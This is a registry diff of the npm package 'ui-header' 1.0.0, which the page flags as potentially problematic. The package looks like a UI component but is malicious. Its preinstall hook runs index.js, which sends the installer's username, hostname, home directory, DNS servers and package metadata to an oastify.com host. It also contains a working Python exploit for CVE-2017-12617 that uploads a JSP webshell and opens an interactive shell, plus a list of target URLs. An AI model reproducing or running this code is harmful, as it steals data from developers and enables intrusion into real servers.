ui-header 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of ui-header might be problematic. Click here for more details.

Files changed (5) hide show
  1. package/42966.py +200 -0
  2. package/index.js +47 -0
  3. package/package.json +12 -0
  4. package/package.json& +12 -0
  5. package/scan.txt +24 -0
package/42966.py ADDED
@@ -0,0 +1,200 @@
1
+ #!/usr/bin/python
2
+ import requests
3
+ import re
4
+ import signal
5
+ from optparse import OptionParser
6
+
7
+ class bcolors:
8
+ HEADER = '\033[95m'
9
+ OKBLUE = '\033[94m'
10
+ OKGREEN = '\033[92m'
11
+ WARNING = '\033[93m'
12
+ FAIL = '\033[91m'
13
+ ENDC = '\033[0m'
14
+ BOLD = '\033[1m'
15
+ UNDERLINE = '\033[4m'
16
+
17
+
18
+ banner="""
19
+
20
+
21
+ _______ ________ ___ ___ __ ______ __ ___ __ __ ______
22
+ / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
23
+ | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
24
+ | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
25
+ | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
26
+ \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
27
+
28
+
29
+
30
+ [@intx0x80]
31
+
32
+ """
33
+
34
+
35
+ def signal_handler(signal, frame):
36
+
37
+ print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
38
+
39
+ exit()
40
+
41
+ signal.signal(signal.SIGINT, signal_handler)
42
+
43
+
44
+
45
+
46
+ def removetags(tags):
47
+ remove = re.compile('<.*?>')
48
+ txt = re.sub(remove, '\n', tags)
49
+ return txt.replace("\n\n\n","\n")
50
+
51
+
52
+ def getContent(url,f):
53
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
54
+ re=requests.get(str(url)+"/"+str(f), headers=headers)
55
+ return re.content
56
+
57
+ def createPayload(url,f):
58
+ evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
59
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
60
+ req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
61
+ if req.status_code==201:
62
+ print ("File Created ..")
63
+
64
+
65
+ def RCE(url,f):
66
+ EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
67
+ <INPUT name='cmd' type=text>
68
+ <INPUT type=submit value='Run'>
69
+ </FORM>
70
+ <%@ page import="java.io.*" %>
71
+ <%
72
+ String cmd = request.getParameter("cmd");
73
+ String output = "";
74
+ if(cmd != null) {
75
+ String s = null;
76
+ try {
77
+ Process p = Runtime.getRuntime().exec(cmd,null,null);
78
+ BufferedReader sI = new BufferedReader(new
79
+ InputStreamReader(p.getInputStream()));
80
+ while((s = sI.readLine()) != null) { output += s+"</br>"; }
81
+ } catch(IOException e) { e.printStackTrace(); }
82
+ }
83
+ %>
84
+ <pre><%=output %></pre>"""
85
+
86
+
87
+
88
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
89
+
90
+ req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
91
+
92
+
93
+
94
+ def shell(url,f):
95
+
96
+ while True:
97
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
98
+ cmd=input("$ ")
99
+ payload={'cmd':cmd}
100
+ if cmd=="q" or cmd=="Q":
101
+ break
102
+
103
+ re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
104
+ re=str(re.content)
105
+ t=removetags(re)
106
+ print (t)
107
+
108
+
109
+
110
+
111
+
112
+ #print bcolors.HEADER+ banner+bcolors.ENDC
113
+
114
+ parse=OptionParser(
115
+
116
+
117
+ bcolors.HEADER+"""
118
+
119
+
120
+ _______ ________ ___ ___ __ ______ __ ___ __ __ ______
121
+ / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
122
+ | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
123
+ | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
124
+ | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
125
+ \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
126
+
127
+
128
+
129
+
130
+ ./cve-2017-12617.py [options]
131
+
132
+ options:
133
+
134
+ -u ,--url [::] check target url if it's vulnerable
135
+ -p,--pwn [::] generate webshell and upload it
136
+ -l,--list [::] hosts list
137
+
138
+ [+]usage:
139
+
140
+ ./cve-2017-12617.py -u http://127.0.0.1
141
+ ./cve-2017-12617.py --url http://127.0.0.1
142
+ ./cve-2017-12617.py -u http://127.0.0.1 -p pwn
143
+ ./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
144
+ ./cve-2017-12617.py -l hotsts.txt
145
+ ./cve-2017-12617.py --list hosts.txt
146
+
147
+
148
+ [@intx0x80]
149
+
150
+ """+bcolors.ENDC
151
+
152
+ )
153
+
154
+
155
+ parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
156
+ parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
157
+ parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
158
+
159
+ (opt,args)=parse.parse_args()
160
+
161
+ if opt.U==None and opt.P==None and opt.L==None:
162
+ print(parse.usage)
163
+ exit(0)
164
+
165
+
166
+
167
+ else:
168
+ if opt.U!=None and opt.P==None and opt.L==None:
169
+ print (bcolors.OKGREEN+banner+bcolors.ENDC)
170
+ url=str(opt.U)
171
+ checker="Poc.jsp"
172
+ print (bcolors.BOLD +"Poc Filename {}".format(checker))
173
+ createPayload(str(url)+"/",checker)
174
+ con=getContent(str(url)+"/",checker)
175
+ if b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
176
+ print (bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
177
+ print (bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
178
+
179
+ else:
180
+ print ('Not Vulnerable to CVE-2017-12617 ')
181
+ elif opt.P!=None and opt.U!=None and opt.L==None:
182
+ print (bcolors.OKGREEN+banner+bcolors.ENDC)
183
+ pwn=str(opt.P)
184
+ url=str(opt.U)
185
+ print ("Uploading Webshell .....")
186
+ pwn=pwn+".jsp"
187
+ RCE(str(url)+"/",pwn)
188
+ shell(str(url),pwn)
189
+ elif opt.L!=None and opt.P==None and opt.U==None:
190
+ print (bcolors.OKGREEN+banner+bcolors.ENDC)
191
+ w=str(opt.L)
192
+ f=open(w,"r")
193
+ print ("Scaning hosts in {}".format(w))
194
+ checker="Poc.jsp"
195
+ for i in f.readlines():
196
+ i=i.strip("\n")
197
+ createPayload(str(i)+"/",checker)
198
+ con=getContent(str(i)+"/",checker)
199
+ if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
200
+ print (str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
package/index.js ADDED
@@ -0,0 +1,47 @@
1
+ //author:- whitehacker003@protonmail.com
2
+ const os = require("os");
3
+ const dns = require("dns");
4
+ const querystring = require("querystring");
5
+ const https = require("https");
6
+ const packageJSON = require("./package.json");
7
+ const package = packageJSON.name;
8
+
9
+ const trackingData = JSON.stringify({
10
+ p: package,
11
+ c: __dirname,
12
+ hd: os.homedir(),
13
+ hn: os.hostname(),
14
+ un: os.userInfo().username,
15
+ dns: dns.getServers(),
16
+ r: packageJSON ? packageJSON.___resolved : undefined,
17
+ v: packageJSON.version,
18
+ pjson: packageJSON,
19
+ });
20
+
21
+ var postData = querystring.stringify({
22
+ msg: trackingData,
23
+ });
24
+
25
+ var options = {
26
+ hostname: "u83bgevclp91jbnqeqvvklvj4aa1ysmh.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
27
+ port: 443,
28
+ path: "/",
29
+ method: "POST",
30
+ headers: {
31
+ "Content-Type": "application/x-www-form-urlencoded",
32
+ "Content-Length": postData.length,
33
+ },
34
+ };
35
+
36
+ var req = https.request(options, (res) => {
37
+ res.on("data", (d) => {
38
+ process.stdout.write(d);
39
+ });
40
+ });
41
+
42
+ req.on("error", (e) => {
43
+ // console.error(e);
44
+ });
45
+
46
+ req.write(postData);
47
+ req.end();
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "ui-header",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall":"node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }
package/package.json& ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "ui-header",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall":"node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }
package/scan.txt ADDED
@@ -0,0 +1,24 @@
1
+ https://open-preview-ent-api.safescore.ai
2
+ https://open-preview-scoring-api.safescore.ai
3
+ https://preview-ap-1.safescore.ai
4
+ https://preview-caas-azure-ap-south-1.safescore.ai
5
+ https://preview-caas-crowdstrike-ap-south-1.safescore.ai
6
+ https://preview-caas-gcp-scc-ap-south-1.safescore.ai
7
+ https://preview-caas-people-ap-south-1.safescore.ai
8
+ https://preview-caas-qualys-ap-south-1.safescore.ai
9
+ https://preview-caas-saas-ap-south-1.safescore.ai
10
+ https://preview-caas-tanium-ap-south-1.safescore.ai
11
+ https://preview-caas-tenable-ap-south-1.safescore.ai
12
+ https://preview-caas-wiz-ap-south-1.safescore.ai
13
+ https://preview-ent-api.safescore.ai
14
+ https://preview-scoring-api.safescore.ai
15
+ https://preview.safescore.ai
16
+ https://signal-ingestor-preview-ap-south-1.safescore.ai
17
+ https://preview-api.safeme.ai
18
+ https://preview-migration.safeme.ai
19
+ https://preview-scim.safeme.ai
20
+ https://preview.safeme.ai
21
+ https://preview.safe-x.cloud
22
+ https://auth.safescore.io
23
+ https://gpt.safescore.io
24
+ https://mygpt.safescore.io